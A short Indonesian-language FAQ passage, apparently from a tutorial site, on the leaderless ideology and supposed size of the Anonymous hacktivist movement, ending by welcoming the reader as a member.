6. Hal benar apa yang harus saya lakukan?

Satu-satunya orang yang dapat memberitahu Anda apa yang tepat bagi Anda adalah diri Anda sendiri.
Ini juga satu-satunya orang yang harus Anda ikuti. Kami tidak memiliki pemimpin.

Anda juga orang yang hanya bertanggung jawab atas tindakan Anda. Lakukan apa yang Anda anggap benar. Jangan lakukan apa yang Anda anggap salah.

7. Berapa banyak Anonimous yang ada?

Kami lebih dari yang Anda pikirkan. Kami lebih dari pikiran siapapun. Kami sangat banyak. Dan Anda sekarang salah satu dari kami. Selamat Datang Anonymous.

Sumber: http://tutorial.inwepo.com

Beranda